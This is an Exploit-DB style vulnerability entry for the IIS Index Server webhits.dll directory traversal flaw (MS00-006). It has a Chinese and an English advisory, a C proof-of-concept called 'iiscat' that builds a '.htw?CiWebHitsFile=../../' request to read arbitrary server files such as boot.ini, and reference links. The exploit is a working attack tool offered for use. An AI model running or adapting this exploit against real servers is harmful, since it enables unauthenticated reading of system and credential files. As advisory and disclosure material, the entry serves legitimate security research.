https://www.exploit-db.com/exploits/19731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-056

MicrosoftIndexServer是WindowsNT4.0可选安装包中包括的一个基于Web的搜索引擎，在Windows2000系统中作为一个服务安装。InternetInformationServer4.0中一个ISAPI应用程序webhits.dll存在安全漏洞，允许攻击者突破WEB的虚拟文件系统，获得对在同一个逻辑驱动器中其它文件(如用户数据库、日志文件等任何能猜测路径名和文件名的文件)的非法访问。Webhits.dll动态链接库与.htw文件关联。但即使在系统中没有任何.htw文件，仍然可能有问题。检查系统是否存在这个安全问题的是输入：http://your_web_server_address/nosuchfile.htw，如果返回信息类似”formatoftheQUERY_STRINGisinvalid”，那么就说明存在安全问题。

source: http://www.securityfocus.com/bid/950/info

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services.

When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

The original patch released for this issue still discloses 'include' file types. 'include' files contain various data which assist in the execution of program files.

/* 
   [email protected] 
   
   example: iiscat ../../../../boot.ini
 */

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
  int file_buf_size = 250;
  
  if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) || 
	(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
    {
      fprintf(stderr, "usage: iiscat file_to_read [valid_file]n");
      exit(1);
    }
  
  file_read = argv[1];
  if (argc == 3)
    file_valid = argv[2];

  sprintf(request, "GET %s", file_valid);
  request_p = request + strlen(request);

  file_buf_size -= strlen(file_valid);
  while(file_buf_size)
    {
      strcpy(request_p, "%20");
      request_p += 3;
      file_buf_size--;
    }

  sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0nn", file_read);
  puts(request);

  exit(0);
}

来源:MS
名称:MS00-006
链接:http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
来源:BID
名称:950
链接:http://www.securityfocus.com/bid/950
来源:OSVDB
名称:1210
链接:http://www.osvdb.org/1210
来源：NSFOCUS
名称：270
链接：http://www.nsfocus.net/vulndb/270